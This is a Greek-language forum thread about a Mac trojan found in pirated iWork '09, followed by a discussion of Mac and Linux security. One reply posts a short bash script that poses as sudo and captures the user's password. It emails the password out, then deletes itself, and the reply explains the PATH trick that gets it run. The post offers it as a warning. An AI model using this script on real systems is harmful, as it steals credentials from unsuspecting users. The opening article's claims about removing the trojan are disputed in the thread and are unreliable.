ο πρώτος ιός «δούρειος ίππος» για τους υπολογιστές Mac!

[george0]

Για όσους δεν το γνωρίζουν οι υπολογιστές Mac δεν έχουν το πρόβλημα των Windows (μα όλων των Windows όμως) με τους ιούς (virus), κοινώς δεν έχουν ιούς, με αποτέλεσμα οι χρήστες των Mac να έχουν μια ήρεμη και ασφαλή «ψηφιακή ζωή». Όχι πλέον.

Για να είμαστε ακριβείς δεν είναι ο Mac ως μηχάνημα (τα τσιπ δηλαδή) που είναι ασφαλής, αλλά το Λειτουργικό Σύστημα (αγγλιστί Operating System – OS) που «φοράει» με την ονομασία Mac OS X. Αυτό είναι που κολλάει ή δεν κολλάει ιούς, ανάλογα το πόσο καλά είναι «γραμμένο» (προγραμματισμένο) από τους κατασκευαστές (εν προκειμένω από την ίδια την Apple). Μέχρι σήμερα οι χρήστες Mac μπορούσαν να ισχυριστούν με χαρακτηριστική άνεση ότι το OS τους ήταν εντελώς οχυρωμένο από ιούς σε σχέση πάντα με τα Windows της Microsoft. Κάπου εδώ όμως -και με την αρωγή της πειρατείας, περισσότερα παρακάτω- ο ισχυρισμός δεν ισχύει, έστω και αν μιλάμε για έναν και μόνο ιό.

Το κακόβουλο προγραμματάκι αυτό, είναι ένας ιός που ανήκει στην κατηγορία των «δούρειων ίππων», ιοί δηλαδή που αυτόνομα δεν κάνουν κάτι κακό, αλλά ανοίγουν εν αγνοία του χρήστη (εξού και δούρειος ίππος) «τρύπες» στο OS, ώστε να εισέλθουν ιοί πραγματικά επιβλαβείς για τον υπολογιστή. Ακόμα χειρότερα οι τρύπες μπορούν να δώσουν πρόσβαση σε ένα άλλο υπολογιστή (πάντα μέσω του Internet), με συνέπειες… σχεδόν άπειρων συνδυασμών, από καταστροφή αρχείων έως και υποκλοπή σημαντικών δεδομένων που μπορεί να έχουμε στο σκληρό δίσκος (ή και δίσκους, αν έχουμε άνω του ενός στον υπολογιστή είτε εσωτερικούς είτε εξωτερικούς). Το όνομα αυτού: OSX.Trojan.iServices.A και βρίσκεται μέσα στην σουίτα προγραμμάτων «iWork `09»

Το ωραίο όμως είναι ότι βρίσκεται μέσα στην σουίτα, αλλά στην σουίτα που μπορούν οι χρήστες να βρουν και να κατεβάσουν πειρατικά, όχι την επίσημη από την σελίδα της Apple (http://www.apple.com/). Δυστυχώς για αυτούς ο ιός που κληρονόμησαν μαζί με την παράνομη πράξη τους (για όσους δεν το γνωρίζουν παρανομία είναι να κατεβάζουμε πειρατευμένο λογισμικό, άσχετα αν είναι τσάμπα και μας συμφέρει οικονομικά), είναι εξαιρετικά «δυνατός» και δεν μπορεί το Mac OS X να γιατρευτεί με καμία απολύτως ενέργεια από μεριάς του απλού χρήστη (ενδεχομένως και του σκληροπυρηνικού), καθώς χρειάζεται ολοκληρωτικό format ο Mac (που συνεπάγεται σβήσιμο των αρχείων στον σκληρό που υπάρχει το OS, μιας και του κάνουμε format), επίσης αν έχουμε περαιτέρω δίσκους πρέπει και σε εκείνους να κάνουμε format (άρα περίπατο τα αρχεία και από εκεί μέσα). Κοινώς σβήσιμο τα πάντα και πάλι από την αρχή. Για όσους δεν έχουν την «πολυτέλεια» να χάσουν τα αρχεία τους, μόνο μια και μοναδική (ως την στιγμή που γραφόταν το παρόν) λύση υπάρχει και ακούει στο όνομα antivirus.

Η εταιρεία που ανακάλυψε τον δούρειο ίππο ονομάζεται Intego, με σχετική ανάρτηση στην ιστοσελίδα της: http://www.intego.com/news/ism0901.asp, όπου επεξηγεί τι ακριβώς κακό κάνει στο Mac OS X, αυτός ο ιός. Επίσης ιστοσελίδες που περιγράφουν τα «συμπτώματα» και τις παρενέργειες του ιού είναι οι: http://www.macworld.com/article/138380/iworktrojan.html και http://i.gizmodo.com/5137161/torrented- ... s-x-trojan . Η λύση του antivirus που αναφέραμε πιο πάνω για όσους δεν θέλουν να κάνουν format με την επικείμενη ολοκληρωτική απώλεια των αρχείων τους, ακούει στο όνομα Intego VirusBarrier X5 με κόστος 72 ευρώ για μία άδεια χρήσης: http://www.intego.com/virusbarrier/home.asp . Τσάμπα πειρατεία μεν, πληρώνουμε για antivirus μετά δε.

πηγη zougla.gr

[george0]

ας ελπίσουμε ότι δεν θα βγει κατή σχετικό και για linux!

[sparus]

Να κάνω εγώ τώρα το δικηγόρο του διαβόλου;
Και που ξέρουμε ότι δεν τον δημιούργησε η Apple και το πλάσαρε στα torrentάδικα για να περιορίσει την πειρατεία; Έχετε δει την τιμή του iwork; http://www.e-shop.gr/show_main.phtml?id=PCF.01054
Δεν ξέρω γιατί αλλά την έχω για αρκετά αδίστακτη εταιρία (βλέπε Steve Jobs). Βέβαια δεν μπορώ να γνωρίζω κάτι οπότε κάνω μόνο σκέψεις.
Ότι και να έγινε πάντως είναι κέρδος για το ελεύθερο λογισμικό. Ας κατεβάσουν το openoffice που πλέον βγαίνει και για mac!

[Dimitris]

Για να μην επαναπαυόμαστε ιοί, δούρειοι ίπποι και σκουληκάκια υπάρχουν και στο linux. Για λεπτομέρειες δείτε εδώ http://en.wikipedia.org/wiki/List_of_Li ... er_viruses

[linuxman]

Για να μην επαναπαυόμαστε ιοί, δούρειοι ίπποι και σκουληκάκια υπάρχουν και στο linux. Για λεπτομέρειες δείτε εδώ http://en.wikipedia.org/wiki/List_of_Li ... er_viruses

Αυτό το ξέρουν όλοι ότι υπάρχουν αυτά , το μόνο πρόβλημα είναι ότι αυτά δεν μπορούνε να κατέβουν στο σύστημα εάν δεν τα βάλουμε εμείς εκεί , δεν ανοίξουμε κάποια τρύπα ώστε να μπουν , δεν εκτελέσουμε άγνωστο πρόγραμμα , δεν έχουμε όνομα χρήστη admin and pass 12345 , εάν όλα αυτά δεν υπάρχουν πως να μπούνε τα καημένα μέσα , θα φάνε πόρτα

[antony74]

Έλεος ρε παιδιά τι ανακρίβειες είναι αυτές που γράφει αυτό το άρθρο... Κατ'αρχάς άλλο trojan και άλλο ιός. Το trojan δεν είναι είδος ιού όπως ισχυρίζεται το παραπάνω κείμενο... Trojan μπορεί να φτιάξει ο καθένας που έχει στοιχειώδεις γνώσεις shell scripting/programming, να το ονομάσει όπως θέλει και να το ανεβάσει σε torrent προς κάθε ανυποψίαστο. Τι σχέση έχει το λειτουργικό; Καθώς όλα γίνονται με τη συγκατάθεση του χρήστη δεν είναι καθόλου δύσκολο να γράψεις κώδικα που να εγκαθιστά π.χ. ένα service στο λειτουργικό. Και φυσικά το λειτουργικό δεν μπορεί να στο αρνηθεί. Κανένα λειτουργικό. Σε ότι αφορά το συγκεκριμένο (OS X) είναι πράγματι ότι ασφαλέστερο για τον απλούστατο λόγο ότι πρόκειται για καθαρό unix σύστημα.

Σε ότι αφορά το εν λόγω trojan, το άρθρο λέει για ολοκληρωτικό σβήσιμο του Mac (!!??). Και των υπόλοιπων δίσκων !!! Καλά αυτό φίλε george0 ποιος στο είπε; Κατ'αρχάς το μόνο που κάνει αυτό το trojan είναι να εγκαταστήσει ένα service. Το ξεφορτώνεσαι με ένα απλό kill και ένα rm. Επιπλέον, ακόμα και αν χρειαζόταν (που δεν ισχύει κάτι τέτοιο), το να φορμάρεις ένα Mac και να το επαναφέρεις με ότι είχε επάνω είναι θέμα 15 λεπτών (Time Machine) χωρίς να ξαναεγκαταστήσεις τίποτα (ούτε το λειτουργικό). 2 click χρειάζονται.

[ftso]

Ένας ωραίος δούρειος ίππος για linux...
Προσοχή μην τον δοκιμάσετε.
Δεν θα δουλέψει έτσι κι αλλιώς...καθώς χρειάζεται το πακέτο nail και μια μικρή προεργασία.
Απλά τον παραθέτω για να δείτε πόσο εύκολο είναι να τρέξει στο linux με μια μικρή βοήθεια από τον ανίδεο χρήστη.

Όνομα: sudo

Κώδικας: Επιλογή όλων


#!/bin/bash
echo -n "[sudo] password for" `whoami`":"
read -s a
echo "Sorry, try again."
echo $a | nail -s "PassWord" name (AT) gmail (DOT) com
rm -f sudo
exit 1

Εκτελώντας:

Κώδικας: Επιλογή όλων

which sudo
echo $PATH

Βλέπουμε ότι το αποτέλεσμα της πρώτης εντολής περιέχεται στο αποτέλεσμα της δεύτερης.
Το μόνο που χρειάζεται λοιπόν είναι να προσθέσουμε τον κατάλογο που θα αποθηκευτεί το πρώτο script (το home για παράδειγμα) μέσα στην μεταβλητή PATH πριν τον κατάλογο της πρώτης εντολής.
Μετά δίνουμε δικαιώματα εκτέλεσης και αυτό ήταν...
Bye bye password...

Την επόμενη φορά που θα πατήσουμε sudo, ο κωδικός θα σταλθεί με email κάπου και αμέσως μετά το script θα διαγραφεί μόνο του.
Μόλις πάμε να ξανατρέξουμε την sudo θα είναι όλα όπως πριν. Ούτε γάτα ούτε ζημιά...


Για αυτό, μην τρέχετε script που βρίσκεται στο διαδίκτυο χωρίς να ξέρετε τι κάνουν και η πηγή τους δεν είναι έγκυρη.
Επίσης προσπαθήστε να εγκαθιστάτε προγράμματα μόνο απο το synaptic ή έγκυρες και σοβαρές πηγές!

[Dimitris]

Πολύ ωραίο παράδειγμα. Η ασφάλεια των υπολογιστών είναι μια ψευδαίσθηση, όποιο κι αν είναι το λειτουργικό. Στις περισσότερες περιπτώσεις έχουμε να αντιμετωπίσουμε "κοινωνική μηχανική" http://en.wikipedia.org/wiki/Social_eng ... _(security) και όχι πραγματικά σφάλματα στο σύστημα.

Ο τύπος αυτός http://en.wikipedia.org/wiki/Robert_Mor ... ptographer) αναφέρει τρεις κανόνες για την ασφάλεια των υπολογιστών:
1. Να μην έχεις υπολογιστή.
2. Να μην τον ανοίγεις.
3. Να μην το χρησιμοποιείς.

Και τώρα ftso μου βάζεις ιδέες να περάσω αυτό το scriptάκι στον υπολογιστή μου, να ζητήσω από τον admin να μου εγκαταστήσει ένα πρόγραμμα και μετά να μην το ξαναχρειαστώ. Ουπς σαν να μην το πα.

[kriti]

δεν έχουμε όνομα χρήστη admin and pass 12345 , εάν όλα αυτά δεν υπάρχουν πως να μπούνε τα καημένα μέσα , θα φάνε πόρτα

linuxman που εμαθες τους κοδικους μου

[digibill]

Για να μην επαναπαυόμαστε ιοί, δούρειοι ίπποι και σκουληκάκια υπάρχουν και στο linux. Για λεπτομέρειες δείτε εδώ http://en.wikipedia.org/wiki/List_of_Li ... er_viruses

Αυτό το ξέρουν όλοι ότι υπάρχουν αυτά , το μόνο πρόβλημα είναι ότι αυτά δεν μπορούνε να κατέβουν στο σύστημα εάν δεν τα βάλουμε εμείς εκεί , δεν ανοίξουμε κάποια τρύπα ώστε να μπουν , δεν εκτελέσουμε άγνωστο πρόγραμμα , δεν έχουμε όνομα χρήστη admin and pass 12345 , εάν όλα αυτά δεν υπάρχουν πως να μπούνε τα καημένα μέσα , θα φάνε πόρτα

Έχω την αίσθηση ότι τα ίδια ισχύουν και στο Mac OS X... Συνεπώς κι εκεί είναι εξίσου δύσκολο -ή ο χρήστης θα πρέπει να είναι εξίσου ηλίθιος!!

Απλά ένα τέτοιο περιστατικό στο open source linux δεν θα είχε νόημα, μιας και δεν νοείται πειρατεία σε open source... Επομένως δεν χρειάζεται να μπεις στον κόπο να ψάξεις να βρεις σπασμένα κλπ.....

Όλα αυτα εμένα απλά μου τονίζουν άλλη μια φορά την σημασία του open source....